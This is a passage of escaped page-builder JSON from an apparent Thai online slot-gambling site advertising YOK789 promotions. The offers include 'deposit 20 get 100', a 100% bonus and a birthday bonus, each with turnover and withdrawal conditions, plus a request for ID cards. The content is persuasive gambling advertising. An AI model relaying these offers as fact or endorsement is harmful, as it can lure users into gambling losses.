\\u0e16\\u0e2d\\u0e19\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aff2186\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-pm-slice=\\\"0 0 []\\\">\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e38\\u0e14\\u0e04\\u0e38\\u0e49\\u0e21\\u0e08\\u0e32\\u0e01 YOK789 \\u0e40\\u0e2d\\u0e32\\u0e43\\u0e08\\u0e2a\\u0e32\\u0e22\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e42\\u0e14\\u0e22\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30 \\u0e01\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1f\\u0e23\\u0e35 100% \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e44\\u0e14\\u0e49\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e22\\u0e2d\\u0e30\\u0e01\\u0e47\\u0e23\\u0e48\\u0e27\\u0e21\\u0e25\\u0e38\\u0e49\\u0e19\\u0e44\\u0e14\\u0e49 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\\u0e16\\u0e2d\\u0e19\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e1b\\u0e31\\u0e08\\u0e08\\u0e38\\u0e1a\\u0e31\\u0e19 \\u0e23\\u0e27\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1d\\u0e32\\u0e01\\u0e41\\u0e23\\u0e01 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1d\\u0e32\\u0e01\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33 \\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e15\\u0e32\\u0e21\\u0e40\\u0e17\\u0e28\\u0e01\\u0e32\\u0e25 \\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e32\\u0e01\\u0e22\\u0e34\\u0e48\\u0e07\\u0e02\\u0e36\\u0e49\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34 \\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1a\\u0e31\\u0e19\\u0e40\\u0e17\\u0e34\\u0e07\\u0e43\\u0e19\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c \\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e44\\u0e23\\u0e01\\u0e47\\u0e15\\u0e32\\u0e21 \\u0e04\\u0e27\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e35\\u0e2a\\u0e15\\u0e34 \\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07 \\u0e41\\u0e25\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e2d\\u0e32\\u0e22\\u0e38 18 \\u0e1b\\u0e35\\u0e02\\u0e36\\u0e49\\u0e19\\u0e44\\u0e1b\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e34\\u0e14\\u0e0a\\u0e2d\\u0e1a\\u0e41\\u0e25\\u0e30\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"36a351d\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"77587d0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"3b12e8f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/20-get-100-Banner-Yok789.webp\",\"id\":281,\"size\":\"\",\"alt\":\"20 get 100\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f1ccc77\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23 20 \\u0e23\\u0e31\\u0e1a 100\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"01efd62\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">\\u0e1d\\u0e32\\u0e01 20 \\u2192 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 80 = \\u0e23\\u0e27\\u0e21 100 \\/ \\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 8 \\u0e40\\u0e17\\u0e48\\u0e32 \\/ \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 200<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li><strong data-start=\\\"996\\\" data-end=\\\"1012\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>\\u00a08 \\u0e40\\u0e17\\u0e48\\u0e32 \\u0e02\\u0e2d\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e23\\u0e27\\u0e21<\\/li><li>\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><li>\\u0e2b\\u0e49\\u0e32\\u0e21\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4f359e1\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/mgbline.com\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"e591d78\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"3e9ff8e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/79-get-200-Banner-Yok789.webp\",\"id\":282,\"size\":\"\",\"alt\":\"79 get 200\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d853dea\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23 79 \\u0e23\\u0e31\\u0e1a 200\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2ea7fc2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">\\u0e1d\\u0e32\\u0e01 79 \\u2192 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 121 = \\u0e23\\u0e27\\u0e21 200 \\/ \\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 7 \\u0e40\\u0e17\\u0e48\\u0e32 \\/ \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 600<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"798\\\" data-end=\\\"837\\\"><strong data-start=\\\"996\\\" data-end=\\\"1012\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>\\u00a07 \\u0e40\\u0e17\\u0e48\\u0e32 \\u0e02\\u0e2d\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e23\\u0e27\\u0e21<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e2b\\u0e49\\u0e32\\u0e21\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"883800f\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/mgbline.com\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"49fe62a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"fc4dc04\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"b25769f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Bonus-free-100_-Banner-Yok789.webp\",\"id\":279,\"size\":\"\",\"alt\":\"Bonus free 100\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4e0d99f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e21\\u0e1a\\u0e31\\u0e2a 100%\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"20cbe32\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"696\\\" data-end=\\\"711\\\">\\u0e04\\u0e38\\u0e49\\u0e21\\u0e2a\\u0e2d\\u0e07\\u0e40\\u0e14\\u0e49\\u0e07<\\/strong> \\u0e40\\u0e15\\u0e34\\u0e21\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/p><ul><li data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"743\\\" data-end=\\\"758\\\">100 \\u0e23\\u0e31\\u0e1a 200<\\/strong><\\/li><li data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"763\\\" data-end=\\\"780\\\">500 \\u0e23\\u0e31\\u0e1a 1,000<\\/strong><\\/li><\\/ul><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"798\\\" data-end=\\\"837\\\"><strong data-start=\\\"798\\\" data-end=\\\"813\\\">\\u0e17\\u0e33 6 \\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>, <strong data-start=\\\"815\\\" data-end=\\\"835\\\">\\u0e16\\u0e2d\\u0e19\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 3 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong><\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e16\\u0e2d\\u0e19 <strong data-start=\\\"848\\\" data-end=\\\"886\\\">\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e15\\u0e31\\u0e14\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 (\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a)<\\/strong> \\u0e2d\\u0e2d\\u0e01\\u0e42\\u0e14\\u0e22\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34 \\u0e40\\u0e2b\\u0e25\\u0e37\\u0e2d\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e16\\u0e2d\\u0e19<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c <strong data-start=\\\"945\\\" data-end=\\\"967\\\">1 \\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\/\\u0e27\\u0e31\\u0e19\\/\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e0a\\u0e49<\\/strong><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"82869dd\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/mgbline.com\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"174fb16\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"498b0c4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/HBD-Bonus-Banner-Yok789.webp\",\"id\":275,\"size\":\"\",\"alt\":\"HBD Bonus\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ae3dca7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy Birthday Bonus \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d7acfa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1415\\\" data-end=\\\"1466\\\">\\ud83c\\udf81 \\u0e09\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e01\\u0e34\\u0e14 \\u0e23\\u0e31\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e02\\u0e27\\u0e31\\u0e0d\\u0e15\\u0e32\\u0e21\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e19\\u0e31\\u0e49\\u0e19 <br \\/>(\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e01\\u0e34\\u0e14)<\\/p><ul><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1480\\\" data-end=\\\"1496\\\">3,000 \\u0e02\\u0e36\\u0e49\\u0e19\\u0e44\\u0e1b<\\/strong> \\u2192 <strong data-start=\\\"1499\\\" data-end=\\\"1513\\\">\\u0e23\\u0e31\\u0e1a\\u0e1f\\u0e23\\u0e35 300<\\/strong><\\/li><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1529\\\" data-end=\\\"1542\\\">500\\u20132,999<\\/strong> \\u2192 <strong data-start=\\\"1545\\\" data-end=\\\"1555\\\">\\u0e23\\u0e31\\u0e1a 50<\\/strong><\\/li><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1571\\\" data-end=\\\"1586\\\">\\u0e44\\u0e21\\u0e48\\u0e40\\u0e01\\u0e34\\u0e19 500<\\/strong> \\u2192 <strong data-start=\\\"1589\\\" data-end=\\\"1616\\\">\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e23 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 100%<\\/strong><\\/li><\\/ul><p data-start=\\\"271\\\" data-end=\\\"387\\\"><span style=\\\"text-decoration: underline;\\\"><strong data-start=\\\"371\\\" data-end=\\\"387\\\">\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"1634\\\" data-end=\\\"1680\\\"><strong data-start=\\\"1634\\\" data-end=\\\"1653\\\">\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 5 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong>, <strong data-start=\\\"1655\\\" data-end=\\\"1678\\\">\\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 3 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong><\\/li><li data-start=\\\"1634\\\" data-end=\\\"1680\\\">\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e42\\u0e14\\u0e22 <strong data-start=\\\"1699\\\" data-end=\\\"1727\\\">\\u0e41\\u0e08\\u0e49\\u0e07\\u0e1a\\u0e31\\u0e15\\u0e23\\u0e1b\\u0e23\\u0e30\\u0e0a\\u0e32\\u0e0a\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19<\\/strong><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e97b605\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/mgbline.com\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9947189\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"b558a2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom